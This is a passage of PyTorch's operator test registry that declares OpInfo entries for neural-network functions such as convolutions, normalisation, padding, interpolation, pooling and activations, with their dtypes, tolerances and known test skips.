75363"), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), DecorateInfo(unittest.skip("Skipped! RuntimeError: bias tensor has to be contiguous"), 'TestGradients', 'test_forward_mode_AD', device_type='cuda', active_if=TEST_WITH_ROCM), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', device_type='cuda', active_if=(not TEST_CUDNN)), ), supports_out=False,), OpInfo('nn.functional.conv1d', aliases=('conv1d',), aten_name='conv1d', dtypes=floating_and_complex_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.chalf, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv1d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=( DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=1e-2)}), 'TestCommon', 'test_complex_half_reference_testing' ), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-3, rtol=1e-3)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', ), ), skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":103, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Ref: https://github.com/pytorch/pytorch/issues/75309 # AssertionError: None mismatch: torch.complex128 is not None DecorateInfo(unittest.expectedFailure, 'TestDtypeCustomRules', 'test_custom_rules', dtypes=(torch.complex64, torch.complex128)), # Ref: https://github.com/pytorch/pytorch/issues/75309 # RuntimeError: UNSUPPORTED DTYPE: complex DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.complex64, torch.complex128)), # Ref: https://github.com/pytorch/pytorch/issues/78077 DecorateInfo(unittest.expectedFailure, 'TestExpandedWeightFunctional', 'test_expanded_weight_per_sample_grad', dtypes=(torch.float64,)), ), supports_expanded_weight=True, supports_out=False,), OpInfo('nn.functional.conv2d', aliases=('conv2d',), aten_name='conv2d', dtypes=floating_and_complex_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.chalf, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=partial(sample_inputs_conv2d), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=( DecorateInfo( toleranceOverride({torch.chalf: tol(atol=6e-2, rtol=5e-2)}), 'TestCommon', 'test_complex_half_reference_testing', ), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=1e-2)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', ), ), skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":103, please report a bug to PyTorch. DecorateInfo(unittest.skip("Works on some configs!"), 'TestJit', 'test_variant_consistency_jit'), # Ref: https://github.com/pytorch/pytorch/issues/75309 # AssertionError: None mismatch: torch.complex128 is not None DecorateInfo(unittest.expectedFailure, 'TestDtypeCustomRules', 'test_custom_rules', dtypes=(torch.complex64, torch.complex128)), # RuntimeError: UNSUPPORTED DTYPE: complex DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.complex64, torch.complex128)), # Ref: https://github.com/pytorch/pytorch/issues/78077 DecorateInfo(unittest.expectedFailure, 'TestExpandedWeightFunctional', 'test_expanded_weight_per_sample_grad', dtypes=(torch.float64,)), ), supports_expanded_weight=True, supports_out=False,), OpInfo('nn.functional.group_norm', aten_name='group_norm', aliases=('group_norm',), ref=reference_group_norm, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ # RuntimeError: Cannot insert a Tensor that requires grad as a constant. # Consider making it a parameter or input, or detaching the gradient DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)) ], sample_inputs_func=sample_inputs_group_norm, supports_expanded_weight=True,), OpInfo('nn.functional.instance_norm', # no ref because instance_norm will often have numerical instability (large numbers or nan) dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, decorators=[ # RuntimeError: Cannot insert a Tensor that requires grad as a constant. # Consider making it a parameter or input, or detaching the gradient DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', active_if=TEST_WITH_ROCM) ], sample_inputs_func=sample_inputs_instance_norm, supports_expanded_weight=True,), OpInfo('nn.functional.layer_norm', aten_name='layer_norm', aten_backward_name='layer_norm_backward', aliases=('layer_norm',), ref=reference_layer_norm, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, assert_jit_shape_analysis=True, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-05, rtol=1e-03)}), 'TestCommon', 'test_numpy_refs' ) ], sample_inputs_func=sample_inputs_layer_norm, supports_expanded_weight=True,), OpInfo('nn.functional.local_response_norm', dtypes=floating_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ], sample_inputs_func=sample_inputs_local_response_norm,), OpInfo('nn.functional.pad', variant_test_name='constant', aten_name='constant_pad_nd', supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='constant'), supports_out=False), OpInfo('nn.functional.pad', variant_test_name='reflect', supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='reflect'), skips=( # Doesn't have a corresponding aten operator. # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), ), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False), OpInfo('nn.functional.pad', variant_test_name='replicate', supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='replicate'), skips=( # Doesn't have a corresponding aten operator. # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), ), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False), OpInfo('nn.functional.pad', variant_test_name='circular', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='circular'), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( # Doesn't have a corresponding aten operator. # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), ), supports_out=False), OpInfo('nn.functional.hardswish', aten_name="hardswish", aten_backward_name='hardswish_backward', supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_hardswish, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_gradgrad=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, autodiff_nonfusible_nodes=["aten::hardswish"]), OpInfo('nn.functional.unfold', aten_name='im2col', aten_backward_name='im2col_backward', dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half), sample_inputs_func=sample_inputs_nn_unfold, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, skips=( # NOTE: this failure may not reproduce consistently on different systems # false INTERNAL ASSERT FAILED at "...torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185 DecorateInfo(unittest.skip("Internal assert failed!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='nearest', supports_autograd=True, supports_fwgrad_bwgrad=True, supports_forward_ad=True, dtypes=floating_types_and(torch.uint8, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.uint8), sample_inputs_func=partial(sample_inputs_interpolate, 'nearest'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='linear', supports_autograd=True, supports_fwgrad_bwgrad=True, supports_forward_ad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), sample_inputs_func=partial(sample_inputs_interpolate, 'linear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='bilinear', supports_fwgrad_bwgrad=True, supports_autograd=True, supports_forward_ad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_interpolate, 'bilinear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='bicubic', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), sample_inputs_func=partial(sample_inputs_interpolate, 'bicubic'), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='trilinear', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_interpolate, 'trilinear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='area', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_interpolate, 'area'), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.upsample_bilinear', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_upsample, 'bilinear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo( "nn.functional.soft_margin_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, # doesn't support grad on target sample_inputs_func=partial(sample_inputs_loss, rhs_requires_grad=False), ), OpInfo('nn.functional.upsample_nearest', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.uint8, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.uint8), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_upsample, 'nearest'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo( "nn.functional.margin_ranking_loss", ref=_NOTHING, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bfloat16, torch.float16), supports_out=False, sample_inputs_func=sample_inputs_margin_ranking_loss, error_inputs_func=error_inputs_margin_ranking_loss, reference_inputs_func=reference_inputs_margin_ranking_loss, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), )), OpInfo( "nn.functional.multi_margin_loss", ref=_NOTHING, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), supports_out=False, supports_gradgrad=False, sample_inputs_func=sample_inputs_multi_margin_loss, ), OpInfo( "nn.functional.multilabel_margin_loss", ref=_NOTHING, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), supports_out=False, supports_gradgrad=False, sample_inputs_func=sample_inputs_multilabel_margin_loss ), OpInfo('nn.functional.leaky_relu', aliases=None, aten_name="leaky_relu", aten_backward_name='leaky_relu_backward', sample_inputs_func=sample_inputs_leaky_relu, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, assert_autodiffed=True, supports_gradgrad=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::leaky_relu"]), OpInfo( "nn.functional.multilabel_soft_margin_loss", ref=_NOTHING, supports_out=False, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_multilabel_soft_margin_loss, supports_forward_ad=True, decorators=( DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-4, rtol=1e-4)}), "TestJit", "test_variant_consistency_jit", ), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ), skips=( # AssertionError: False is not true : Scalars failed to compare as equal! 0 != 4096 # __main__.TestJitCUDA.test_variant_consistency_jit_nn_functional_multilabel_soft_margin_loss_cuda_float32 # leaked 4096 bytes CUDA memory on device 0 DecorateInfo( # Skip instead of expectedFailure because this fails # locally for me but passes in CI. unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit", device_type="cuda", ), ), ), OpInfo('nn.functional.avg_pool2d', aten_name='avg_pool2d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_avgpool2d, skips=( DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cuda'), )), OpInfo('nn.functional.fractional_max_pool2d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.fractional_max_pool2d, input, *args, **kwargs), # vmap does not support random operations check_batched_forward_grad=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), test_neg_view=False, sample_inputs_func=sample_inputs_fractional_max_pool2d, decorators=( # FIXME: AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'))), OpInfo('nn.functional.fractional_max_pool3d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.fractional_max_pool3d, input, *args, **kwargs), # vmap does not support random operations check_batched_forward_grad=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), test_neg_view=False, sample_inputs_func=sample_inputs_fractional_max_pool3d, decorators=( # FIXME: both derivatives are implemented incorrectly # https://github.com/pytorch/pytorch/issues/69322 # FIXME: AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),)), OpInfo('nn.functional.max_pool1d', aten_name='max_pool1d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, # TODO: add shape checks assert_jit_shape_analysis=False, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator', device_type='cpu'), DecorateInfo(unittest.skip("Works on some configs"), 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Works on some conifgs"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.bfloat16,)), ), sample_inputs_func=sample_inputs_max_pool), OpInfo('nn.functional.max_pool2d', aten_name='max_pool2d', supports_autograd=True, # Vmap is not happy with non-contiguous (channels_last) inputs check_batched_gradgrad=False, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, assert_jit_shape_analysis=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_max_pool), OpInfo('nn.functional.max_pool3d', aten_name='max_pool3d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, # TODO: add shape checks assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), # TODO: investigate nondeterminism gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_max_pool), OpInfo('nn.functional.max_unpool1d', aten_name='max_unpool1d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool, skips=( # Gradients are tested in `variant_test_name=grad` below. # We skip tests here because there is non-determinism in backward # with gather, when there are writes into the same memory location, # and if there are several indices pointing to the same memory, # gradcheck is oblivious about that and cannot perturb them all at once # (see sample_inputs_max_unpool_grad to find out more). DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), )), OpInfo('nn.functional.max_unpool1d', variant_test_name='grad', aten_name='max_unpool1d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool_grad), OpInfo('nn.functional.max_unpool2d', aten_name='max_unpool2d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool, skips=( # Gradients are tested in `variant_test_name=grad` below. # We skip tests here because there is non-determinism in backward # with gather, when there are writes into the same memory location, # and if there are several indices pointing to the same memory, # gradcheck is oblivious about that and cannot perturb them all at once # (see sample_inputs_max_unpool_grad to find out more). DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), )), OpInfo('nn.functional.max_unpool2d', variant_test_name='grad', aten_name='max_unpool2d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # Vmap is not happy with non-contiguous (channels_last) inputs check_batched_grad=False, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool_grad), OpInfo('nn.functional.max_unpool3d', aten_name='max_unpool3d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool, skips=( # Gradients are tested in `variant_test_name=grad` below. # We skip tests here because there is non-determinism in backward # with gather, when there are writes into the same memory location, # and if there are several indices pointing to the same memory, # gradcheck is oblivious about that and cannot perturb them all at once # (see sample_inputs_max_unpool_grad to find out more). DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), )), OpInfo('nn.functional.max_unpool3d', variant_test_name='grad', aten_name='max_unpool3d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, assert_jit_shape_analysis=False, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_max_unpool_grad), OpInfo('nn.functional.linear', aten_name='linear', supports_autograd=True, sample_inputs_func=sample_inputs_linear, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfROCM=floating_and_complex_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), # linear calls mm under the hood which is nondeterministic on CUDA # https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html#torch.use_deterministic_algorithms gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, supports_expanded_weight=True, decorators=( DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), )), OpInfo('nn.functional.bilinear', aten_name='bilinear', supports_autograd=True, sample_inputs_func=sample_inputs_bilinear, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), skips=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bfloat16,)), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('nn.functional.glu', aten_name='glu', supports_autograd=True, sample_inputs_func=sample_inputs_glu, dtypes=floating_types_and(torch.bfloat16), dtypesIfROCM=floating_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo( 'nn.functional.elu', aten_backward_name='elu_backward', ref=lambda x, alpha=1.0, inplace=False: np.maximum(0., x) + np.minimum(0., alpha * (np.exp(x) - 1)), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_kwargs=lambda device, dtype, input: ({'alpha': 0.8}, {'alpha': 0.8}), inplace_variant=lambda x, alpha=1.0: torch.nn.functional.elu(x, alpha, inplace=True), decorators=[ # Not implemented yet DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-03, rtol=1.2e-03), torch.bfloat16: tol(atol=1e-03, rtol=1.2e-03) }), 'TestUnaryUfuncs', device_type='cuda', ), ], ), OpInfo( 'nn.functional.prelu', aten_backward_name='prelu_backward', ref=lambda x, weight: np.maximum(0., x) + np.minimum(0., x) * (weight if x.ndim == 1 else weight.reshape([weight.size if i == 1 else 1 for i in range(0, x.ndim)])), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_inputs_func=sample_inputs_nn_functional_prelu, decorators=[ # FIXME: second derivative is implemented but seems to be incorrect # https://github.com/pytorch/pytorch/issues/68760 DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_gradgrad'), # RuntimeError: Cannot insert a Tensor that requires grad as a constant. # Consider making it a parameter or input, or detaching the gradient # https://github.com/pytorch/pytorch/issues/68752 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ], ), UnaryUfuncInfo( 'nn.functional.celu', ref=lambda x, alpha=1.0, inplace=False: np.maximum(0., x) + np.minimum(0., alpha * (np.exp(x / alpha) - 1)), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_kwargs=lambda device, dtype, input: ({'alpha': 0.8}, {'alpha': 0.8}), inplace_variant=lambda x, alpha=1.0: torch.nn.functional.celu(x, alpha, inplace=True), decorators=[ # Not implemented yet DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD'), DecorateInfo( toleranceOverride({ torch.float16: tol(atol=1e-03, rtol=1.2e-03), torch.bfloat16: tol(atol=1e-03, rtol=1.2e-03) }), 'TestUnaryUfuncs', device_type='cuda', ), ], ), UnaryUfuncInfo( 'nn.functional.rrelu', aten_backward_name='rrelu_with_noise_backward', op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.rrelu, input, *args, **kwargs), ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_autograd=True, assert_autodiffed=False, supports_gradgrad=True, supports_out=False, sample_kwargs=lambda device, dtype, input: ({'lower': 0., 'upper': 1.}, {'lower': 0., 'upper': 1.}), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(partial(torch.nn.functional.rrelu, inplace=True), input, *args, **kwargs), decorators=( DecorateInfo( toleranceOverride({ 